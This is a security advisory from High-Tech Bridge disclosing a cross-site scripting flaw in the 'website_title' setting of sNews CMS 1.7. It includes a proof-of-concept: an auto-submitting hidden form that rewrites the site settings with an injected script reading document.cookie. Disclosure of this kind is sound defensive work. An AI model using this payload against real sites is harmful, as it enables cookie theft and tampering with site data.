Vulnerability ID: HTB22638 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_snews_1.html Product: sNews Vendor: sNews Team ( tp://www.snewscms.com/ ) Vulnerable Version: 1.7 and probably prior versions Vendor Notification: 05 October 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "snews.php" script to properly sanitize user-supplied input in "website_title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/?action=process&task=save_settings"; method="post" name="main" > <input type="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'> <input type="hidden" name="home_sef" value="home"> <input type="hidden" name="website_description" value="sNews CMS"> <input type="hidden" name="website_keywords" value="snews"> <input type="hidden" name="website_email" value="info@xxxxxxxxxxxx"> <input type="hidden" name="contact_subject" value="Contact Form"> <input type="hidden" name="language" value="EN"> <input type="hidden" name="charset" value="UTF-8"> <input type="hidden" name="date_format" value="d.m.Y.+H:i"> <input type="hidden" name="article_limit" value="3"> <input type="hidden" name="rss_limit" value="5"> <input type="hidden" name="display_page" value="0"> <input type="hidden" name="num_categories" value="on"> <input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html"> <input type="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf"> <input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png"> <input type="hidden" name="comment_repost_timer" value="20"> <input type="hidden" name="comments_order" value="ASC"> <input type="hidden" name="comment_limit" value="30"> <input type="hidden" name="word_filter_file" value=""> <input type="hidden" name="word_filter_change" value=""> <input type="hidden" name="save" value="Save"> </form> <script> document.main.submit(); </script>
